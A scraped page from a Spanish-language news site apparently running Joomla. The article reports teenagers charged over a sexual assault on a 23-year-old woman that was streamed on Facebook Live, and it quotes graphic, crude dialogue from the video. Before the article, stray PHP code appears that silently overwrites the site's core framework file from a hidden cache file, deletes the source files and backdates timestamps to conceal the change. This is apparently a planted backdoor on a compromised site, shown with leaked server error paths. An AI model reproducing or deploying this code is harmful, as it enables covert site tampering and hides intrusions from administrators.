$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Adolescentes graban escenas horribles de una agresión sexual y la transmiten en Facebook Live

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: Primicias > De Aquí > Adolescentes graban escenas horribles de una agresión sexual y la transmiten en Facebook Live

Adolescentes graban escenas horribles de una agresión sexual y la transmiten en Facebook Live

Imprimir PDF

alt

Tres adolescentes de Mississippi se enfrentan cargos de secuestro y agresión sexual por un ataque "espantoso y horrible" contra una mujer de 23 años, el cual se convirtió en viral al ser transmitido en Facebook Live.

Haleigh Alexis Hudson, de 19 años, y sus cómplices, Ezzie Johnson y Kadari Fabien Booker, ambos de 17 años, están bajo arresto acusados de secuestro por delitos graves y agresión sexual.

El video que fue descrito por una mujer, que publicó una copia del mismo, como "terriblemente horroroso" - ya ha sido removido de Facebook, pero al menos una versión de la misma se había compartido más de 1,500 veces y obtuvo más de 84.000 vistas desde el jueves.

La policía respondió a una llamada en una vivienda en Gulfport el martes por denuncias de un ataque y descubrió el video que describía el asalto sexual y físico. El video original había sido borrado, pero no antes de que otro usuario de Facebook identificado como Tiffany Hailey lo volviera a publicar en su página, informa The Clarion-Ledger.

El vídeo de 15 minutos, cargado de exclamaciones, empieza dentro de un cuarto de baño, con un hombre de pie sobre una mujer mientras sujeta su pene y le exige que realice sexo oral. "¡Chupa eso d-!" El hombre dice.

Hailey le dijo a The Clarion-Ledger que no conocía a nadie en el video y no se puso en contacto con la policía. En su lugar, ella se acercó directamente a la víctima a través de Facebook. "Esto es terriblemente horrible", dijo Hailey del video. "Es realmente, muy malo."

Otros usuarios de Facebook dijeron que la víctima tiene necesidades especiales. Papania dijo que esas reclamaciones serían investigadas y que cargos adicionales de abusar del adulto vulnerable serían presentados si se confirmaba.

En una parte de la grabación del video, se puede escuchar una voz femenina diciendo que la víctima no volvería a casa hasta que ella realizara sexo oral. "Ella no va a casa", dice la voz. "Ella está atrapada... ella va a chupar un poco de d- hasta que su garganta se hinche".

Los investigadores creen que Johnson y Hudson conocían a la víctima antes del presunto asalto. La policía informó que se esperan más arrestos en el caso”. (Sun Herald)